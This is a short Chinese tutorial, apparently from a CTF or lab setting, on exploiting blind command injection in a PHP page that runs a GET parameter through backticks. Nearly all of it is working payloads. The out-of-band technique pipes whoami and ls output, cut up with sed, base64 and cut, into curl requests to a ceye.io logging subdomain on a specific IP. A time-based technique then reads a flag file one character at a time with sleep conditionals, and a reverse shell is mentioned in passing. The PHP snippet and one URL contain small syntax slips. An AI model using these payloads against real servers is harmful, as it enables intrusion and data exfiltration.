存在命令執行,但是不會直接回顯,所以需要特殊的指令把結果帶出來。
<?php
$cmd = $_GET[`cmd`];
`$cmd`;
1.ceye.io
需要注冊個賬號,然后會給你分配個域名
訪問:
http://106.13.124.93/test.php?cmd=curl http://snrkgl.ceye.io/`whoami`
執行的結果
http://snrkgl.ceye.io/www-data(用戶名www-data)
其他情況:
# ls -sl
執行:
http://106.13.124.93/test.php?cmd=curl http://snrkgl.ceye.io/`ls -al`
結果:
http://snrkgl.ceye.io/total
看起來只能帶出第一行,所以我們需要sed命令
http://106.13.124.93/test.php?cmd=curl http://snrkgl.ceye.io/`ls -al | sed -n '2p'`
結果:
http://snrkgl.ceye.io/drwxr-xr-x
發現空格不能被帶出來,用base64編碼
http://106.13.124.93/test.php?cmd=curl http://snrkgl.ceye.io/`ls -al | sed -n '2p'|base64`
結果:
http://snrkgl.ceye.io/ZHJ3eHIteHIteCAyIHJvb3Qgcm9vdCA0MDk2IERlYyAyNyAxNDo1OSAuCg==
解碼:drwxr-xr-x 2 root root 4096 Dec 27 14:59 .
若有的時候長度太大,cut來分割字符(第一個字符下標為1)
http://106.13.124.93/test.php?cmd=curl http://snrkgl.ceye.io/`ls -al |cut -c 3-10`
2.反彈shell,不多bb
3.sleep
#請注意空格,測試環境ubuntu server 16.04
http://106.13.124.93/test.php?cmd=?cmd=if [ 1 == 1 ];then sleep 2;fi
http://106.13.124.93/test.php?cmd=?cmd=if [ 1 == 2 ];then sleep 2;fi
#請注意空格
http://106.13.124.93/test.php?cmd=if [ $( whoami | cut -c 1) = 'w' ];then sleep 2;fi
http://106.13.124.93/test.php?cmd=if [ $( whoami | cut -c 1) = 'r' ];then sleep 2;fi
#注意空格
http://106.13.124.93/test.php?cmd=if [ $( cat flag | cut -c 1) = '1' ];then sleep 2;fi
http://106.13.124.93/test.php?cmd=if [ $( cat flag | cut -c 1) = '2' ];then sleep 2;fi